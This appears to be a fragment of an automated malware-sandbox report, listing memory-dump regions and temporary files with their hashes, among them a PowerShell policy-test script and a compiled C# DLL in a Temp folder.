memory/1516-8-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp
memory/1516-13-0x00007FF844410000-0x00007FF844420000-memory.dmp
memory/1516-14-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp
memory/1516-17-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp
memory/1516-16-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp
memory/1516-18-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp
memory/1516-15-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp
memory/1516-28-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp
memory/1516-27-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yqwjavry.nki.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3924-36-0x000001E3FAB30000-0x000001E3FAB52000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\phphutyt\phphutyt.cmdline
| MD5 | 3e174c33287fbd83920a12442c4d0a4d |
| SHA1 | cd0ffea739bfc65ed49524a86e2af800e40a2fb3 |
| SHA256 | 4aafc0e3444dfa58b4a5ae2fdbdd52ceb742b9f2dc4f16310dbd116a698b60f1 |
| SHA512 | 5052d3205b006f65f5911e6053619f03f0dd1dc4e13393dad19944a5aaf59dcb9a0729ac42ac51fad9ac236c861d74fc1d1c1f35723dbcd7cfae0d4fa0356b4f |
\??\c:\Users\Admin\AppData\Local\Temp\phphutyt\phphutyt.0.cs
| MD5 | f4dd5c682eb7b3b679f084261bfc7c4c |
| SHA1 | 70f75d7a4e42c185eb09139ed3c6f7338a2219c2 |
| SHA256 | 2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319 |
| SHA512 | 8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d |
\??\c:\Users\Admin\AppData\Local\Temp\phphutyt\CSC2A904C096FD447478D207CE19AE7F1.TMP
| MD5 | 7b9a81e634a234ab28f3b53fcb3526f1 |
| SHA1 | 7a627ae55d53dc0ea53677e93cf2fda70dfe0fed |
| SHA256 | 06a87569b6882f9308573fc517204028ae2d4b1bd82d3c7bad321b141ed0cd12 |
| SHA512 | 00e36f5f09d80dff7f027345a13c16edb303fb27333ad32c6208db61a3e5182a44a63cfec4b66abaaf7ad0ebd1d9d2ff954b18d4fa023d61e2116aa60ed6c0b6 |
C:\Users\Admin\AppData\Local\Temp\RES7D3E.tmp
| MD5 | 7778d4e820e391232ea60fa3873fdd89 |
| SHA1 | fd3b5d53047bf4c1a5f16560ebc41d66a6ff13d6 |
| SHA256 | b5cdf462a9a28fc0b065c10f5451c926eecf128532d99fd436e4f9664b5964de |
| SHA512 | d4fbbb0faa605335ebd640fa6e12adb337e05d97e43a52ad57409514cf7cb10b95f1efe542a2d687534444cba9b94b210ed845680a7bd87b4008b477303aa231 |
C:\Users\Admin\AppData\Local\Temp\phphutyt\phphutyt.dll
| MD5 | 856cf077c25c603f01aeb7dadd5f753e |
| SHA1 | ce9d50265de193cdde5ec84d25bc2819dc5b8ed2 |
| SHA256 | a8c38cd2026cdc21d43e8c1ae6fe2bf36c8c42b5ef1149b2717933d656454cf8 |
| SHA512 | 9962dcd4d55abac42bfaa94beaf867b2c205987e6c8906988c81cd2cee7471c5aafb7163743c3c8fe52598f764f49a0fc88ed9b2bbb0b57984b175816baa0aa9 |
memory/3924-56-0x000001E3FAB20000-0x000001E3FAB28000-memory.dmp
memory/1516-60-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp
memory/1516-61-0x00007FF88648D000-0x00007FF88648E000-memory.dmp
memory/3924-62-0x000001E3FB440000-0x000001E3FBEBE000-memory.dmp
memory/3924-65-0x000001E3FC940000-0x000001E3FD426000-memory.dmp
memory/3924-66-0x000001E3FC940000-0x000001E3FD426000-memory.dmp
memory/3924-64-0x000001E3FC940000-0x000001E3FD426000-memory.dmp
memory/3924-63-0x000001E3FC940000-0x000001E3FD426000-memory.dmp
memory/1516-67-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
| MD5 | b7039431a29d664ae0a6e28d2a030a7a |
| SHA1 | b8c9192498057085b130146ea17775b3baf32dbf |
| SHA256 | d860cc29eceb19347215999a95032a3cf5d4cbc8b7cf95059f6ea8d44dd25c64 |
| SHA512 | 3794a5bc89a56f7168caea9b9ba95fbda1ad56714d3e3dc69659c794aa738df0519d68812564dda50e819c97887546c65a76791205b042f1df17f4bbc8536d4d |
memory/3924-76-0x000001E3FC940000-0x000001E3FD426000-memory.dmp